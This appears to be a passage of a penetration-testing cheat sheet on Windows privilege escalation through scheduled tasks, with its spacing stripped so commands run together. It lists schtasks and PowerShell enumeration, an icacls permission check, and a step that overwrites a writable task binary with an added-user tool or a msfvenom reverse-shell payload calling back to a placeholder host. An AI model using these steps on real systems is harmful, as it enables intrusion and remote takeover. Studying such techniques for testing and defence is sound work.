# Generally backup files otherwise lots of noiseschtasks/query/foLIST/v# Look in Author, TaskName, Task To Run, Run As User, and Next Run Time fields.OR# PowerShellGet-ScheduledTask|ftTaskName,TaskPath,StateGet-ScheduledTask|where{$_.TaskPath-notlike"\Microsoft*"}|ftTaskName,TaskPath,State
Exploitation
1) icacls <file.exe># Do we have M or F on BUILTIN/USERS or Username?2) Replace the file directly with adduser.exe or msfvenom shellmsfvenom-pwindows/shell_reverse_tcpLHOST=<IP>LPORT=<>-fexe-oCommon.exe